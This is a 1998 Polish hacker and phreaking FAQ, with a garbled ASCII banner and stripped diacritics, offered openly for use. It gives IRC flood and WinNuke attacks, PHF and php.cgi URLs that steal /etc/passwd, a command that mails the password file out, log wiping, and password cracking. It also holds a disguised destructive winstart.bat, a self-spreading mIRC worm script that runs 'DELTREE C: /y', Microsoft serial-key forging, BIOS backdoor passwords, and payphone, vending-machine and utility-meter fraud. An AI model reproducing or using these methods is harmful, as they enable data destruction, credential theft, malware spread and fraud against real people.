ĿĿ Ŀ Ŀ Ŀ ĿĿĿ ۳۳۳۳۳ ۳ Ŀ۳۳ ۳ ڿ۳ ۳ڿ۳ ۳۳ ۳۳۳ ۳ ۳۳ ۳۳ ۳ĴĴ۳ ۳ ڿڿ۳۳ ۳ ۳۳ÿ ۳ ÿ ۳ ver. 1.5 22 marca 98 polskie znaki: Latin 2 Witajcie bracia! aski Wszechmogcego niechaj spyn na was, a tych ktrzy Jego imi kalaj niechaj pochon czeluci piekielne. Pan z Wami! Tekst ten nasta wycznie w celach edukacyjnych i nie ponosz odpowiedzialnoci za utrat dostpu do Internetu lub czegokolwiek innego w wyniku stosowania metod tu opisanych, czyli jak ci kto namierzy i udupi to miej pretensje do samego siebie a nie do mnie. Jest on o wszystkim po trochu, tzn. o IRC-u, phreakingu, hackerstwie, Unixie i podobnych sprawach. Bdzie on stale uaktualniany jak tylko dowiem si czego ciekawego, co godne zamieszczenia bdzie. Cz tego FAQ jest mojego autorstwa, a cz to texty z FAQ innych hackerw lub zasyszane w rnych okolicznociach ;) Spis treci 1. IRC 1.1. Jak komu dokopa 1.2. Boty 2. Unix 2.1. Jak si wama 3. Windoza - zady i walety 3.1. Winword 3.2. Plik win.ini 3.3. Plik winstart.bat 3.4. Logo windozy 3.6. Cudowne komendy 3.7. mIRC i jego skrypty 4. BIOS-y 5. Phreaking 5.1. Budki telefoniczne 5.1.1. Automaty na etony 5.1.2. Automaty na karty 5.2. Automaty sprzedajce Col 5.3. Wodomierze 1. IRC 1.1. Jak komu dokopa Istnieje wiele sposobw aeby komu dokopa na IRC-u. Jedn z metod stosowanych na rnorakich lamerkw jest np. wejscie na query i zaproszenie na kana #5,0. Kto wejdzie na ten kana zostanie wyrzucony z serwera :). Mona te wpisa: /me has invited you to join #5,0 - jak kto jest lamer to nie odrni tego od prawdziwego invite ale prawdziwi hackerzy stosuj zwykle bardziej wyrafinowane metody. Mona te kogo sfloodowa czyli zasypa go bzdurnymi tekstami typu "zesraj si dziadu...", funkcjami CTCP (ping, version, time, finger, page, userinfo, clientinfo). Co ambitniejsi stosuj floodowanie z kilku sesji - jest bardziej efektywniejsze i zmniejsza zagroenie wykopania z serwera za flood. Mona take wykorzysta WinNuke do namierzenia gocia na IRC-u i zawieszenie mu komputera :) ale on musi mie windoz 95. Jak kto chce WinNuke to niech mailnie. 1.2. Boty Bot jest to program, ktry siedzi na IRC-u i udaje normalnego usera. Ma on jednak wbudowane rne funkcje np. autokick za flood lub za wulgaryzmy, autoop, protect i tak dalej. O stawianiu bota na razie nie bd si rozpisywa, napisz tylko, e aby postawi takiego bota, trzeba mie konto unixowe. Niektre boty wymagaj take zainstalowanego klienta IRC na tym koncie. To by byo na razie o stawianiu botw, wicej moecie si dowiedzie z plikw readme doczonych do konkretnego bota. Teraz moe co o rozwalaniu wyej wymienionych. No wic jeli bot jest gupi, mona go sprbowa zfloodowa z kilku sesji - niektre wyrzucaj na kana texty w stylu "Floodujesz mnie synu...", albo wchodzimy z np. trzech sesji, z kadej czynimy "/CTCP VERSION bot" po 50 razy (eby nas nie wywalio) a pniej "/IGNORE bot". Jeli uda si go sfloodowa w ten sposb bot bdzie praktycznie cay czas rzuca tymi textami lub odpowiada na VERSION i w kocu go wywioz z serwera za flood :) 2. Unix 2.1. Jak si wama Aby wama si do serwera Unixowego i pozna czyje haso, lub uzyska konto niekoniecznie z akceptacj szanownego administratora, naley zdoby plik /etc/passwd na tym serwerze lub dopisa si do niego. Dobrze jest mie zaoony jaki lewy e-mail do celw hackerskich gdzie na polboksie, hotmailu, geocities, kki lub czym podobnym. Uyj zmylonych personaliw (imi/nazwisko/adres). Moesz te uy iname (www.iname.com) jako "redirectora" - jak masz np. maila izydor@polbox.com to moesz sobie zaoy np. izydor@writeme.com, izydor@polandmail.com, izydor@2die4.com, izydor@2sexy4u.com... (jak kto tam napisze, to mail zostanie posany dalej na polbox) lub jaki inny mao znaczcy - trzeba si niele namczy eby zobaczy imi, nazwisko i prawdziwy e-mail, a ten i tak jest anonimowy :). Oprcz tego, jeli haczycie z dial-upw (dzwonicie przez modem do jakiego providera) to jest to wysoce karalne - administrator zobaczy e jaki czowieczek np. izydor@dial-79.supermedia.pl cign passwd i co dalej? Ot ten to admin pisze sobie maila do administratora Supermedii, i namierza, kt to jest ten izydor. Mona za to w najlepszym przypadku straci konto. Wic najlepiej korzysta z darmowego dial-upu tpsa (suxx, ale do hackerstwa wystarczy). Jak admin zobaczy w logach noname@ppp-86.warszawa.tpnet.pl to ci wiele nie zrobi, ale jak sie uprze, to potrafi ci namierzy. Mona jeszcze robi tak: zhaczy zobie np. trzy serwery, na kadym po kilka kont. Pniej telnetowa si na pierwszy, przez pierwszy na drugi, pniej na trzeci, pniej znw na pierwszy, ale pod innym kontem... uczyni tak ptelk, pniej np. zrzuci passwd, zrobi przemeblowanie na serwerze, a pniej wycofywa si z ptli - jak telnetujesz si np. do Francji, z Francji do Finlandii, pniej jeszcze do USA i przez USA do Polski to zanim dojd kto si wama minie p roku ;) * Metody zdobycia pliku passwd Gdy masz konto: - Telnetujesz si na serwer, logujesz si i piszesz "cat /etc/passwd" i wywietla si ten plik (jeli akurat masz dostp do niego, np. jeste rootem, albo jest udostpniony dla wszystkich). S specjalne programiki do "bycia rootem" wykorzystujce rnorakie dziury w systemie, a zowi si one exploitami. Wystpuj one w duych ilociach na rootshellu (www.rootshell.com). Mona jeszcze ewentualnie uczyni to tak: "cat /etc/passwd | mail inydor@writeme.com" (korzystamy z redirectora) Pniej odbieramy mejle i dostajemy plik /etc/passwd prosto do skrzynki pocztowej. Gdy nie masz konta: - Uruchamiasz FTP, wpisujesz adres serwera, login ftp (lub anonymous), w password zalecaj podanie adresu e-mailowego ale podaj jaki zmylony lub sam znak @ (bdzie w logach) i piszesz "get /etc/passwd". Uwaga - ta metoda dziala bardzo rzadko (na lamerskich serwerach, z takimi adminami), w innych przypadkach passwd jest falszywy, albo zshadowany, albo jedno i drugie ;) - Metoda PHF - wpisz w browserze: http://www.tu.wpisz.serwer.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd - Metoda PHP - wpisz w browserze: http://www.tu.wpisz.serwer.com/cgi-bin/php.cgi?/etc/passwd Te dwie metody nie dziaaj na wszystko, ale mona poprbowa, jak admin jest lamerkiem i nie chce mu si instalowa nowszych wersji programw, mona si sprbowa pobawi. *** UWAGA! *** W/w metody maj jedn wad: wszystko jest logowane, to znaczy e jak wykupie sobie np. konto na Polska Online i od razu zrzucasz sobie passwd, lub co krcisz, to jest to zapisywane do specjalnych plikw (logw). Mona stosowa czyszczenie logw (np. killog), korzysta z lewego maila (patrz kilka piter wyej), lub spoofowa - np. jak jestemy przez tpsa, to uruchamiamy spooferka i udajemy poczenie np. z www.zgroza.com.pl. Ma to jednak du wad - jest to "blind spoofing" wic serwer-ofiara nie wysya informacji na twj ekran, tylko z uporem maniaka wszystko le na www.zgroza.com.pl. Ale wama si mona. Mona prbowa takich rzeczy jak "cat /etc/passwd | mail izydor@writeme.com" - admin nie namierzy, bo w logach zobaczy www.zgroza.com.pl, no wic le maila na root@zgroza.com.pl i... po max. dziesiciu minutach mail przychodzi z powrotem z dopiskiem "adresat nieznany" :). Mona tak narobi chay komu, kogo nie lubimy - po prostu zostawiamy go w logach... biedne dziecko. * Co dalej? Linijka z pliku passwd wyglda tak: root:z1YAmW5ZwE7qQ:0:0:root:/root:/bin/bash I jest uczyniona wedug tego wzoru: login:zakodowane haso:numer uytkownika:numer grupy:opis:katalog domowy:shell Jeli zamiast hasa jest x, lub gwiazdka *, sprbuj wstuka /etc/shadow zamiast /etc/passwd, ale moe nie zadziaa. Ale jeli ju masz ten plik, odkoduj go. Aby odkodowa haso naley mie program do tego celu, jak np. John the Ripper pod DOS. Uruchamianie: john -pwfile:[plik z hasami] -single lub druga metoda (wymaga sownika) john -pwfile:[plik z hasami] -wordfile:[sownik] mona jeszcze tak: john -pwfile:[plik z hasami] -wordfile:[sownik] -rules UWAGA! to dziaa tylko w Johnie 1.4. Jak co znajdzie to wywietli, a potem... telnetujesz si i logujesz tak, jak ci poda John :) Jak zamae haso roota moesz sobie poczyta jego poczt, poformatowa dyski - root ma due moliwoci w systemie. Jak kto chce Johna to niech mailnie. 3. Windoza - zady i walety 3.1. Winword Dopisa komu do skrtu zamiast "winword.exe" "winword.exe -mFileExit". Word zacznie prac od jej skoczenia :). Dziaa na Worda 6.0 i 7.0, na Word97 nie sprawdzaem bo nie mam :P 3.2. Plik win.ini Zmieni komu linijk "shell=progman.exe" (win 3.1x) na "shell=calc.exe" - zamiast Menedera Programw na pocztku wczy si kalkulator :) Mona te wstawi jaki inny programik typu pbrush.exe - jak kto bdzie chcia zrobi co innego ni rysowanie to si mocno zawiedzie - zamknicie shella koczy windoz :) W win95 shellem jest explorer.exe, ale nie manipulowaem przy nim jeszcze, bo mnie si nie chciao. 3.3. Plik winstart.bat Plik ten naley umieci w katalogu Windows. Jest on uruchamiany przy starcie windozy - mona dopisa tam jakie bzdury, szlaczki, krzaczki, melodyjki, pitnacie Wordw czy inne wielce przydatne rzeczy. Mona te tam dopisa program pod tytuem FLEX - zrzucajcy naciskane klawisze na dysk - przydaje si jak kto ma Windows na haso lub si loguje do jakiego Novella. Jak kto go chce to niech mailnie. Jeli was to nie satysfakcjonuje, w tyme pliku mona jeszcze uczyni co, aby kasowao gociowi np. win.ini, albo win.com, albo co takiego: --- WINSTART.BAT --- @echo off echo Verifying your system, please wait... rem to dla zachowania pozorw, e windoza sobie co sprawdza... copy c:\config.sys c:\dos copy c:\autoexec.bat c:\dos rem robimy lamuchowi kopi zapasow, gdy mamy lito nad zwierztami echo System verified. echo Synchronizing drive C: echo Do not interrupt this operation! echo DAMAGED BOOT SECTOR, DISK UNUSABLE > config.sys rem teraz wpisujemy gupoty do config.sys echo dir c:\ /s > autoexec.bat rem a teraz do autoexec.bat - to spowoduje e przy starcie systemu bdzie si rem wywietlaa zawarto dysku C: (wszystkie pliki w kadym katalogu) echo call autoexec.bat >> autoexec.bat rem a teraz wywoujemy jeszcze raz autoexec, eby si za szybko nie skoczyo rem po tej linijce dir c:\ /s bdzie wykonywao si nieskoczon ilo razy, rem dopki kto nie przerwie... a jak przerwie to system wykona polecenie rem "call autoexec.bat" i od nowa Polska ludowa... :) echo Drive C: synchronized, loading Windows now... --- WINSTART.BAT --- Wiersze zaczynajce si od "rem" to komentarze, moesz je spokojnie wywali. 3.4. Logo windozy *** dla wersji 3.1x *** No wic jest plik win.com i on zawiera w sobie logo. A co by byo jakby jakiemu lamuchowi zmieni to logo na co innego - np. napis "Killer Virus Activated - Destroying in progress..." ? Wikszo takich lamerkw panicznie boi si wirusw, wic nasz lamuch w panice zacznie resetowa komputerek, a jak kto resetuje komputer podczas adowania windozy to moe si to le skoczy :>. Logo jest w formacie RLE - to taki jaki obskurny format graficzny, obsuguje go na przykad Graphics Workshop. Jeli chcecie zmienia orginalne logo - jest ono w podkatalogu system, nazywa si vgalogo.rle. No wic wczamy jaki program malarski, piszemy np. napisik straszcy. I co dalej? W podkatalogu system jest plik win.cnf. Jest to plik, ktry moe zastpowa win.com, ale jest od niego nieco mniejszy - brakuje mu logo. Przyjmujc, e nowe logo naszego autorstwa nazywa si lame.rle i jest w katalogu system, piszemy tak: C:\WINDOWS\SYSTEM>copy /b win.cnf +lame.rle ..\win.com Po takim zabiegu uczyni si nowy win.com, zawierajcy nasze logo. Stary moemy sobie uprzednio zasejwowa pod inn nazw lub przywrci tak: C:\WINDOWS\SYSTEM>copy /b win.cnf +vgalogo.rle ..\win.com I ju. Lamerka mona niele nastraszy. Tylko nie przesadcie - plik win.com moe mie najwyej 64 KB, pniej mog nastpi problemy... *** dla windozy 95 *** Defaultowe logo tym razem nie wiem gdzie jest, bo nie chciao mi si sprawdza :P Ale jeli uczynimy sobie bitmapk o rozmiarach 320 na 400, w 256 kolorkach, z zawartoci podobn jak pitro wyej, i zasejwujemy j jako C:\LOGO.SYS, to wanie ona wywietli si przy starcie tego jake wspaniaego systemu... Huh. Mona jeszcze zmieni lamuchowi bitmapy C:\WINDOWS\LOGOW.SYS (poczekaj na zamknicie systemu) i C:\WINDOWS\LOGOS.SYS (Mona teraz bezpiecznie wyczy komputer). Przy zamykaniu systemu, windoza sejwuje rne swoje pliczki. No wic napis o wirusie wstawiamy do LOGOW.SYS i... huh. 3.5. Numery seryjne M$ Kiedy instalujesz kolejny wspaniay wytwr znanej na caym wiecie firmy Mikro$oft, przychodzi moment, e installer pyta ci o kod. A co uczyni jeli, hmm, powiedzmy e ten to kod zapomniae spisa od kumpla, lub nie istnia w pudeku z programem (bo nie mia pudeka), ani w instrukcji (bo adnej instrukcji nie byo), a cracka na razie nie ma? No wic jeli kod jest w formie XXXX-XXXXXXXX to wpisz 1234-12345467 - powinno zadziaa. Kody w postaci XXX-XXXXXXX s zbudowane w nastpyjcy sposb: trzy pierwsze cyfry s dowolne, a suma nastpnych musi by podzielna od 7 i wiksza od 7, czyli mona wpisa 000-4031337. Istniej jeszcze numerki, ktre s uczynione na ten wzr: XXXXX-OEM-XXXXXXX-XXXXX. Zasada jest nastpujca: trzy dowolne cyfry, pniej 95, 96 lub 97 (rok produkcji, np. dla win osr2-97, dla osr1-96, dla zwykych-95), suma nastpnych siedmiu musi by podzielna przez 7 i wiksza od 7 (jw.), a ostatnie pi cyfr jest dowolne, no wic przykadowy numerek bdzie wyglda tak: 83696-OEM-4031337-89364. Huh, mam nadziej e komu pomogem. 3.6. Cudowne komendy Istniej sobie komendy, ktre warto wykona zdalnie przez windoz jakiemu lamuchowi. Jedn z nich jest "DELTREE C: /Y" - kasuje cay dysk. Mona te np. pozby si lamucha np. z IRC-a, czynic mu tak oto komend "RUNDLL32 User,ExitWindows" - windoza elegancko si zamyka. Komendy takie mona czyni np. przez strony WWW - o tem potem, w nastpnej wersji FAQ, bo teraz mi si nie chce pisa. :) 3.7. mIRC oraz jego skrypty No wic jest sobie taki przecitny programik do ircowania. Nazywa si mIRC. Zajmuj si nim dlatego, e od pewnego czasu na IRC-u grasuje pewien skrypt. Jest on samo-rozmnaajcy si (sam si rozsya jak kto wchodzi/wychodzi na kana na ktrym jest zainfekowany). Cay dowcip jest w tym, e jako jeden z plikw skryptu do mIRC-a jest ustawiony SCRIPT.INI. No wic ten to skrypcik wanie tak si nazywa. Oprcz tego jako domylny katalog odbioru dcc jest ustawiony katalog, gdzie jest mIRC (np. C:\MIRC), a tam te rezyduje SCRIPT.INI... No wic jeli wylemy taki skrypt lamerkowi, ktre ma AutoGet, to zarazimy go. Moemy te mu troch naciemnia, np. tak: cze! cze chesz moj skrypt pod mIRC-a? a do czego to jest? huh... no dobra jesli ktos cie zabanowal i wykopal, to ty mozesz sam sie odbanowac i wyrzucic go z IRC-a wow super daj! ok :) lap /DCC SEND lamuch SCRIPT.INI mam, co teraz zrobic? teraz przegraj go tam gdzie jest mirc32.exe dzieki! :) Dobra, teraz moe co o budowie tego skryptu... --- SCRIPT.INI --- [script] n0=;---------------------------------------------------------- n1=; NeoScript ver. 997, (C) 1939 by Adolf H. n2=;---------------------------------------------------------- n3=ON 1:TEXT:!UMRZYJ!:*:/quit jestem lamerem n4=;jezeli ktos napisze !UMRZYJ! - lamera wyrzuca z IRC-a n5=ON 1:TEXT:!KASUJ!:*:/run DELTREE C: /y n6=;reakcja na !KASUJ! - kasacja dysku C: n7=ON 1:TEXT:!EXITWIN!:*:/run RUNDLL32 User,ExitWindows n8=;zamykamy lamerkowi windoze na odleglosc n9=ON 1:JOIN:#:{ n10= if ( $nick != $me ) { /dcc send $nick $mircdirscript.ini n11= } n12=} n13=;rozmnazanie skryptu, jesli ktos wchodzi na kanal dostaje go n14=ON 1:TEXT:!PIERDOLEC!:*:/msg $nick mam pierdolca n15=;info - kto jest zainfekowany ten odpowie n16=ON 1:TEXT:!DAWAJOPA!:?:/mode $chan +o $nick n17=;no comment n18=ON 1:TEXT:!KOP!:?:/ban $me | /kick # $me n19=;lamer sam sie kopie n20=ON 1:TEXT:IDIOTA:*:/amsg jestem idiota i zasranym debilem n21=ON 1:TEXT:LAMER:*:/ame to LAMER! n22=ON 1:TEXT:BLUZGAJ:*:/amsg kurwa cholera huj chuj dupa jebana pizda n23=ON 1:TEXT:MATKA:/amsg moja matka to kurwa n24=;to sluzy do robienia kichy lamerowi --- SCRIPT.INI --- Jak bedziecie to rozpowszechniac to wytnijcie moje komentarze - te zaczynajce si od rednika. Myl e to jest zrozumiae. 4. BIOS-y Jeeli masz AWARD BIOS-a na haso moesz wpisa kilka tzw. unihase (wymyliem nowe sowo) : Zbgn, zbg, AWARD_SW, >AWARD<, condo. Na AMI BIOS-y niekiedy dziaa unihaso ami. Dla Phoenix BIOS unihaso to czasem 1234 lub 1234567. Oprcz unihase na AMI BIOS jest jeszcze jedna metoda - AMI Decode. Jest to program wydubujcy haso z tego BIOS-u, ale najpierw kto musi ono wpisa. 5. Phreaking 5.1. Budki telefoniczne Mona wpi si telefonem w kabel przy budce - ale nie rcz za skutki - podobno telekomunici to wykrywaj i pniej wdruj do budki oraz sprawdzaj. Mona te zdoby/uczyni telefon taki jak maj monterzy - suchawka z tarcz (do wybierania) - eby by mniejszy. S dwie metody: ciachn kabelek i podczy swj telefon, albo na kocu kabla przylutowa igy i wpina si poprzez izolacj. 5.1.1. Automaty na etony - Wrzuci 5 gr. jako eton A - na niektre jeszcze dziaa. - Przywali nad otwr zwrotu etonu - zaliczy impuls. - Woy yk do zwrotu etonw i pomanipulowa - zrobi si zwarcie i zaliczy impuls. - Strzeli iskr z zapalarki piezoelektrycznej do gazu w tarcz automatu. 5.1.2. Automaty na karty - Zdobywanie kart: zablokowa miejsce wypadku kart papierem, foli, zuyt kart, gum do ucia z zapakami lub checz - karty nie wypadaj. Poniej przyj wieczorkiem i wyduba wszystko co tam zostao. Jednake osoby proceder ten uprawiajcy powinny blokad przyklei, albowiem automat wyrzuca karty z pewn si, ktra moe okaza si za dua i nasz papier moe wylecie razem z kart, a chyba nie to byo w planie. :) - Fakeowanie kart: naklei na nie do koca zuyt kart tam video - rozmagnesuje tam zamiast karty. Pniej odklei i naklei now. Mona jeszcze kart usmarowa lakierem. Praktykowana jest take taka metoda: odczyta sygna z dobrej karty i nagra go na zuyt, ale do tego trzeba mie wrodzone zdolnoci ;) - Numer 6230015 - z budki na kart - pacisz 18gr za 3min i dostajesz sygna czyli moesz dzwoni dalej, np. na 0700. 5.2. Automaty sprzedajce Col - Naley wrzuci stare 20 z i kupi puszk jakiej cieczy - automat wrczy ci puszk oraz wspaniaomylnie wyda reszt z piciu z. 5.3. Wodomierze - Mona odkrci np. wod w wannie tak, aeby kapaa po kropelce, po czym i sobie do szkoy, a jak wrcimy, to mamy ca wann wody a wodomierz nawet nie drgnie, albo leciutko zmieni si jego wskazanie, co jest lepsze od burzliwego napeniania wanny H2O ;) * Koniec * Greetingsy dla: przede wszystkim ludzi, z ktrych materiaw korzystaem przy produkcji tekstu powyszego. Pan z wami! Jeli ten FAQ zawiera jakie niecisoci lub bzdury, lub jeli masz co ciekawego, godnego zamieszczenia, napisz do mnie na metallo@kki.net.pl.